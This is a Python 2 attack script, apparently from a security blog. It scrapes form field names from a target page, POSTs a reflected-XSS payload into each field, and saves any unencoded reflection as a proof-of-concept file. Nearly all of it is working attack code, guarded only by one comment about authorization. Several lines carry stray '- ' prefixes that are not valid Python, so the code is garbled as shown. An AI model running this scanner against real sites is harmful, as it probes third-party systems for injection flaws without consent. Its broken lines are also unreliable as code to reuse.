- #!/usr/bin/env python
- # try_POST_xss.py
- #
# first we GET http://argv[1]:80/argv[2] and scrape every name="..." attribute
# to learn which form fields (inputs/textareas/selects/submits) the page exposes.
# next we POST each discovered field name separately with 'payload' and check
# whether the payload comes back reflected in the response body.
# Only run this against hosts you are explicitly authorized to test.
# More @ http://hauntit.blogspot.com
# enjoy.
- import urllib
- import urllib2
- import re
- import sys
- import httplib
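# Fail fast with a usage line before indexing argv: the check further down in
# MAIN only runs after these two indexes have already succeeded, so a missing
# argument would otherwise surface as an IndexError traceback instead.
if len(sys.argv) < 3:
    sys.stderr.write('usage: ' + sys.argv[0] + ' localhost /path/2file.php\n')
    sys.exit(1)

host = sys.argv[1]       # bare hostname or IP, no scheme
path_file = sys.argv[2]  # absolute path of the page whose form is tested
url = host + ':80'       # NOTE: plain HTTP on port 80 only -- no TLS, no custom port
url_file = url + path_file

# Single fixed probe string. The POST check below looks for it in the
# response; a reflection is only interesting if it comes back unencoded.
payload = '\'><body onload=alert(/2222/)>;]#/**'
# if you want I have version 'payloads-from-file' too.
print('Target: ' + host)
print('Vuln file: ' + path_file)
print('Full URL to attack: ' + url_file)
print('')

# Fetch the page once and harvest its field names. urllib.urlopen does not
# raise on HTTP error codes here, so the status is printed to make a 404/500
# visible; the handle is closed even if read() fails.
get_connect = urllib.urlopen('http://' + url_file)
try:
    get_response = get_connect.read()
    status = get_connect.getcode()
finally:
    get_connect.close()
print('Status of requested page: ' + str(status))

# Field names: accept name="x" and name='x' in any case, and keep each name
# once (page order preserved) so no field is POSTed twice. This is a crude
# scrape, not an HTML parse -- it also picks up name= on non-form tags.
_name_re = re.compile(r"""\bname\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
results = []
for _name in _name_re.findall(get_response):
    if _name not in results:
        results.append(_name)

# Proof-of-concept output: the raw target response for any hit is written
# here. Opened once for the whole run (truncating a previous file) and shared
# by every do_post_now() call, so it must not be closed per parameter.
poc = open('poc_file_for_POST_xss.html', 'w')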
- # func to send POST to target url+found parameter
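def do_post_now(url, param=None):
    """POST the XSS payload in one form field and report whether it is reflected.

    url   -- 'host:port' string handed straight to httplib.HTTPConnection
    param -- field name to inject into. Defaults to results[i], i.e. the
             module-level loop index the caller maintains (kept so existing
             do_post_now(url) calls keep working).

    Returns the offset of the reflected payload in the response body, or -1
    when it is not found. The connection is closed even if the request raises.
    Reads the module globals payload, path_file, results, i and poc.
    """
    if param is None:
        param = results[i]
    params = urllib.urlencode({param: payload})
    headers = {'Content-type': 'application/x-www-form-urlencoded',
               'Accept': 'text/plain'}
    connect = httplib.HTTPConnection(url)
    try:
        connect.request('POST', path_file, params, headers)
        response = connect.getresponse()
        print('%s %s' % (response.status, response.reason))  # 200 OK?
        data = response.read()
    finally:
        connect.close()  # end of test for this parameter at this URL

    # Look for the whole payload, not just the '2222' marker: the marker alone
    # false-positives on any page containing that digit run, and an
    # HTML-encoded reflection of the payload is not exploitable anyway.
    pos = data.find(payload)
    if pos != -1:
        print('\t[+- ( POST XSS alert! ) -+]')
        print('\t [+] Found POST XSS for param %r at offset %d' % (param, pos))
        # Show the reflected context (the original printed data[0], a single
        # character, which told the operator nothing).
        print(data[pos:pos + 120])
        # Append the raw response as the proof-of-concept page. poc is opened
        # once at module level and shared by every call, so it is deliberately
        # not closed here (closing it here broke later writes); flush so the
        # file is usable even if the run is interrupted.
        poc.write(data)
        poc.flush()
    return pos
# end of do_post_now(url)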
- # ---
- # MAIN:
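# MAIN:
# Two positional arguments are required (host and path), so the threshold is
# 3, not 2. Note argv is already indexed at module top, so with fewer
# arguments the script fails there before reaching this check.
if len(sys.argv) < 3:
    sys.stderr.write('usage: ' + sys.argv[0] + ' localhost /path/2file.php\n')
    sys.exit(1)
elif results:
    print('-------------------------------------------------------------')
    print('Got some results :) Now we can try to exploit parameters.\n')
    try:
        # do_post_now() reads the module-level index i to pick results[i], so
        # the loop variable must stay named i and stay global.
        for i, name in enumerate(results):
            print('Found param called: ' + name)
            print('Do POST now, for URL: ' + url + ' with param: ' + name)
            do_post_now(url)
    finally:
        # Close the shared proof file exactly once, after every parameter has
        # been tested; closing it inside the helper broke later writes.
        poc.close()
else:
    print('No name="..." attributes found in the page; nothing to POST.')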